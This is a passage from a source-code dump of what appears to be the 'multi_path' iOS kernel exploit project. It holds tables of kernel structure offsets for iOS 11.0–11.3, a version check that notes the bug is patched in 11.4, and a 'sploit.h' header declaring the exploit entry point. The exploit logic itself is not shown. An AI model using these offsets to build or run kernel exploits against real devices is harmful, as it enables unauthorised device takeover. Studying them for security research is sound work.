26 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
27 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
28 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
29 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
30 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
31 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
32 |
33 | 0x10, // KSTRUCT_OFFSET_PROC_PID,
34 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD
35 |
36 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
37 |
38 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
39 |
40 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
41 |
42 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
43 |
44 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
45 |
46 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
47 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
48 |
49 | 0x6c, // KFREE_ADDR_OFFSET
50 | };
51 |
52 | int kstruct_offsets_11_3[] = {
53 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
54 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
55 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
56 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
57 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT,
58 | 0x30, // KSTRUCT_OFFSET_TASK_PREV,
59 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
60 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
61 |
62 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
63 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
64 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
65 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
66 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
67 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
68 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
69 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
70 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
71 |
72 | 0x10, // KSTRUCT_OFFSET_PROC_PID,
73 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD
74 |
75 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
76 |
77 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
78 |
79 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
80 |
81 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
82 |
83 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
84 |
85 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
86 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
87 |
88 | 0x7c, // KFREE_ADDR_OFFSET
89 | };
90 |
91 | int koffset(enum kstruct_offset offset) {
92 | if (offsets == NULL) {
93 | printf("need to call offsets_init() prior to querying offsets\n");
94 | return 0;
95 | }
96 | return offsets[offset];
97 | }
98 |
99 |
100 | void offsets_init() {
101 | if (@available(iOS 11.4, *)) {
102 | printf("this bug is patched in iOS 11.4 and above\n");
103 | exit(EXIT_FAILURE);
104 | } else if (@available(iOS 11.3, *)) {
105 | printf("offsets selected for iOS 11.3 or above\n");
106 | offsets = kstruct_offsets_11_3;
107 | } else if (@available(iOS 11.0, *)) {
108 | printf("offsets selected for iOS 11.0 to 11.2.6\n");
109 | offsets = kstruct_offsets_11_0;
110 | } else {
111 | printf("iOS version too low, 11.0 required\n");
112 | exit(EXIT_FAILURE);
113 | }
114 | }
115 |
--------------------------------------------------------------------------------
/multi_path/sploit.h:
--------------------------------------------------------------------------------
1 | #ifndef sploit_h
2 | #define sploit_h
3 |
4 | mach_port_t run(void);
5 |
6 | #endif
7 |
--------------------------------------------------------------------------------
/multi_path/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/test
--------------------------------------------------------------------------------